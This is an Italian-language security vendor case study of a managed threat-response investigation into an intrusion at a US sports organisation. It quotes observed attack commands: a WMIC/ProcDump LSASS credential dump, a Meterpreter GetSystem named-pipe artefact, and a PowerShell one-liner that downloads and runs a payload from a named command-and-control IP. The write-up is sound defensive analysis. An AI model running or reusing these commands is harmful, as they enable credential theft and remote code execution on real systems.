Profilo del cliente: un’organizzazione sportiva professionale con sede negli Stati Uniti, con circa 800 dispositivi.
Il team Sophos Managed Threat Response (MTR) offre funzionalità di ricerca, rilevamento e risposta alle minacce 24 ore su 24, 7 giorni su 7, fornite da un team di esperti come servizio completamente gestito.
L’indizio iniziale: un ago nel pagliaio
Alla ricerca di eventi sospetti, il team di Sophos MTR analizza ogni giorno decine di milioni di punti dati sfruttando le informazioni sulle minacce, il machine learning e complessi set di regole derivati dall’esperienza in prima linea che gli operatori hanno acquisito rispondendo alle minacce giorno dopo giorno. Questa analisi viene eseguita con l’obiettivo di rilevare segnali che potrebbero potenzialmente essere indicatori di un attacco.
In questo caso, il segnale era di uno strumento Sysinternals di Microsoft legittimo. ProcDump.exe: un tool solitamente utilizzato dagli sviluppatori per analizzare i processi software in esecuzione e “eseguire il dump” della loro memoria su disco in modo che possa essere ispezionata. Gli sviluppatori trovano questo strumento molto utile per capire perché si sta verificando un bug.
Tuttavia, in questo caso, ProcDump stava tentando di esportare lo spazio di memoria di lsass.exe. Ciò ha dato l’allarme al team operativo di Sophos MTR, che monitora l’ambiente del cliente 24 ore su 24, 7 giorni su 7.
LSASS è il servizio del sottosistema dell’autorità di sicurezza locale in Microsoft Windows ed è responsabile dell’applicazione delle policy di sicurezza e della gestione degli accessi ai sistemi Windows. Se uno dovesse scrivere la sua memoria su disco, i nomi utente e le password degli utenti potrebbero essere recuperati da esso.
Il team Sophos MTR aveva effettivamente individuato un indicatore di attacco. Qualcuno stava cercando di rubare le credenziali.
Probabilmente avete sentito parlare di Mimikatz, uno strumento il cui unico scopo è rubare password, hash, token di sicurezza e così via. Gli attaccanti a volte evitano di utilizzare questo strumento dato che spesso viene rilevato dai prodotti di sicurezza. Ma a differenza di Mimikatz, ProcDump ha usi legittimi oltre a quelli nefasti, e quindi è raramente rilevato dai fornitori di sicurezza.
Qualcuno stava cercando di non farsi prendere.
Inizia l’indagine
Il caso è stato creato nello stesso istante in cui è stato generato il segnale e un operatore Sophos MTR ha immediatamente iniziato a indagare.
Tentativo di furto di credenziali
L’operatore ha esaminato i dati storici raccolti dal nostro agent e ha individuato il processo che ha causato il rilevamento. Il processo stava cercando di richiamare un comando:
C:\Windows\system32\cmd.exe /C wmic /node:”SERVER NAME” process call create “C:\PerfLogs\procdump.exe -accepteula -ma lsass C:\PerfLogs\lsass.dmp”
Il comando mostra l’interprete della riga di comando di Windows cmd.exe che tenta di utilizzare WMIC, l’interfaccia di Windows Management Instrumentation. WMI è uno strumento per interagire con i sistemi locali e remoti per ottenere informazioni e inviare loro istruzioni.
Chiamando un server remoto (redatto in SERVER NAME), il comando stava cercando di dire al server di eseguire ProcDump e scrivere la memoria del processo LSASS su disco.
Per fortuna l’operatore MTR non ha trovato prove che “lsass.dmp” fosse scritto su disco e una revisione della telemetria di Sophos Central ha mostrato che la tecnologia di prevenzione del furto di credenziali Sophos ha sventato con successo il tentativo dell’aggressore.
Ma da dove viene questo comando?
Tentativo di escalation dei privilegi
L’operatore ha cercato il backup dell’albero dei processi per trovare il parent di (cioè ciò che è stato avviato) cmd.exe e ha trovato svchost.exe, il Windows Service Host utilizzato per eseguire singoli processi e preservare risorse di elaborazione.
La stessa istanza di svchost ha anche generato un altro processo figlio:
C:\Windows\system32\cmd.exe /c echo 4d6b1c047b2 > \\.\pipe\8eaee7
A un occhio inesperto, il comando precedente non sembra ovviamente dannoso. Eppure questo è un artefatto comune che può essere osservato dalla funzione GetSystem di Meterpreter.
Meterpreter è un payload che fornisce a un aggressore l’accesso interattivo dalla riga di comando a un host e GetSystem è uno script integrato in Meterpreter che aiuta il malfattore ad acquisire i privilegi di sistema completi impersonando una named pipe, una tecnologia che consente ai processi di comunicare l’uno con l’altro.
Per fortuna il named pipe che stavano cercando di sfruttare non esisteva nel sistema in quel momento.
Comando e controllo
Sapendo che l’avversario stava usando il Meterpreter, si poteva supporre che dovesse avere un qualche tipo di connessione di rete per inviare in remoto i propri comandi all’host compromesso.
Scavando nei log di rete, l’operatore MTR ha potuto vedere un gran numero di connessioni in uscita all’indirizzo IP bulgaro 217.12.202.89 utilizzando la porta di rete 443.
La porta 443 viene generalmente utilizzata dall’HTTPS per connettersi in modo sicuro ai siti Web e gli aggressori la utilizzano comunemente per nascondersi nel traffico Web legittimo.
Questa scoperta ha avviato la revisione di questo IP con sede in Bulgaria. Una delle porte che aveva aperto a Internet era la porta 50050. Si tratta di una porta temporanea, una che non può essere registrata con IANA e quindi non è una porta comune utilizzata da servizi di rete noti. Tuttavia, l’operatore MTR l’aveva già vista molte volte.
La 50050 è la porta di ascolto predefinita per un server Cobalt Strike. Quest’ultimo è uno strumento di “emulazione delle minacce” tipicamente commercializzato per i penetration tester per facilitare gli attacchi avversari e aiutare le organizzazioni a vedere il rischio di violazioni.
Tuttavia, gli autori di minacce dannose hanno messo le mani su questo strumento e lo utilizzano per orchestrare attacchi reali a vittime innocenti.
Notifica al cliente
Solo pochi minuti dopo il rilevamento, l’operatore MTR ha completato l’indagine iniziale e ha avuto la certezza che si trattasse di un’attività antagonista dannosa.
Sophos MTR offre tre modalità di risposta che i clienti possono alternare in qualsiasi momento:
Notifica: Sophos conduce l’identificazione e l’indagine delle minacce, informando il cliente dei risultati e offrendogli consigli su come rispondere all’attacco.
Collaborazione: Sophos conduce l’identificazione e l’indagine delle minacce e collabora alla risposta alla minaccia, dividendo le responsabilità tra il cliente e il team di Sophos MTR.
Autorizzazione: Sophos conduce l’identificazione, l’indagine e la risposta alle minacce e intraprende azioni proattive, informando il cliente su ciò che è stato rilevato e sulle azioni di risposta intraprese.
In questo caso, il cliente MTR era in modalità di notifica. L’operatore ha contattato il cliente telefonicamente per discutere la scoperta e fornire consigli su come rispondere ai risultati immediati prima che l’indagine continuasse.
L’operatore MTR ha condiviso le sue scoperte e le informazioni sugli account utente sfruttati dall’avversario. Questi ultimi dovevano reimpostare immediatamente le loro password per disabilitare l’accesso dell’aggressore. Oltre alla telefonata, tutti i dettagli sono stati forniti in un’e-mail a cui fare riferimento.
La caccia continua
Mentre il cliente lavorava alla reimpostazione delle password degli account compromessi, l’operatore MTR continuava a seguire gli spostamenti dell’aggressore all’interno della rete del cliente. A questo punto, non era stata trovata alcuna traccia su come fossero entrati.
Si noti che per tutta la durata del caso, la comunicazione tra l’operatore MTR e il cliente è avvenuta tramite e-mail.
In agguato nel cloud
Un’analisi più approfondita del traffico di rete sull’host compromesso ha mostrato il traffico HTTPS tra questo host e un altro che risiedeva nel cloud privato virtuale (VPC) del cliente, dove dispone di una serie di server che si affacciano sulla rete Internet pubblica.
Analizzando più approfonditamente i log del server nel VPC, l’operatore MTR ha individuato rapidamente ulteriori tentativi di GetSystem e di impersonificazione di named pipe. Tuttavia, tutte le prove indicavano gli host compromessi già identificati.
Inoltre, è stata identificata l’esecuzione del comando di PowerShell (un linguaggio di scripting integrato in Windows per l’utilizzo con l’automazione delle attività):
“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://217.12.202.89:80/axdfcvgfdfgyhnhgvcdfvghjh’))”
Questo comando one-line raggiunge un URL e scarica ed esegue un payload che trova lì. L’URL punta allo stesso IP bulgaro in cui il team MTR ha trovato le porte aperte per Cobalt Strike.
SophosLabs
L’operatore MTR ha contattato rapidamente i SophosLabs, la divisione Sophos di analisi delle minacce, intelligence e ricerca. Condividendo il comando precedente, l’operatore MTR ha chiesto assistenza per analizzare il payload ospitato su quell’URL. In pochi minuti, i SophosLabs hanno condiviso le proprie intuizioni con Sophos MTR.
Purtroppo il payload in questione non era più presente: apparentemente era stato eliminato dall’aggressore poco dopo averlo utilizzato. I SophosLabs hanno prontamente aggiunto l’IP e l’URL alla piattaforma di cloud intelligence che è alla base di tutti i prodotti e servizi Sophos in modo che ogni ulteriore utilizzo di quel server di comando e controllo venga rilevato e bloccato da tutti i clienti Sophos.
Trovare l’accesso iniziale
Infine, l’operatore MTR ha identificato dove è iniziato l’attacco. Continuando l’analisi dei log di rete del server VPC, è stata individuata all’interno del VPC la comunicazione RDP (Remote Desktop Protocol) a un host sconosciuto. Quest’ultimo non era gestito da Sophos MTR, né si riusciva a trovare nell’account Sophos Central del cliente.
L’operatore ha contattato il cliente per chiedere informazioni su questo host sconosciuto e perché non fosse in gestione.
Pare che l’avessero disattivato troppo tardi. L’aggressore si è spostato lateralmente dall’host originale compromesso a un altro ed ha eseguito il comando PowerShell. Ciò gli ha dato l’accesso remoto a un nuovo host nel caso in cui avesse perso l’accesso tramite RDP.
Questa si è rivelata una mossa intelligente dell’avversario, poiché è esattamente quello che è successo.
Troppo spesso i server RDP si affacciano sulla rete Internet pubblica, e ciò li rende un obiettivo primario degli aggressori. Una volta entrati nella rete aziendale, l’RDP è un metodo rumoroso ed evidente per avere accesso remoto. I cursori in movimento sullo schermo sono una sorta di regalo.
La prima cosa che un nemico cercherà di fare è spostarsi lateralmente, su un altro host, e installare una shell inversa, un modo per richiamare l’host e fornire l’accesso alla riga di comando. L’uso della riga di comando è un metodo di accesso remoto molto più furtivo, che consente di nascondersi in background anche mentre un utente è connesso e utilizza l’host.
Non ci è dato sapere quali fossero gli obiettivi dell’avversario. Gli operatori MTR hanno identificato l’aggressore molto prima che fosse in grado di agire, intercettandolo mentre era ancora nelle fasi di propagazione della rete, spostandosi lateralmente e tentando di aumentare i propri privilegi.
A seguito delle indagini, gli operatori MTR hanno continuato a monitorare la proprietà del cliente in riferimento a questa specifica minaccia per altri sette giorni, senza identificare ulteriori attività dannose o sospette.
Il team MTR ha quindi concluso che l’avversario fosse stato espulso con successo dalla rete.
Caso chiuso. Alla prossima.
Per saperne di più
Per ulteriori informazioni sul servizio Sophos MTR, visita il nostro sito Web o parla con un rappresentante Sophos.
Se si preferisce condurre la propria caccia alle minacce, Sophos EDR offre gli strumenti necessari per la ricerca avanzata delle minacce e l’igiene delle operazioni di sicurezza IT. Inizia oggi stesso una prova gratuita di 30 giorni.
Leave a Reply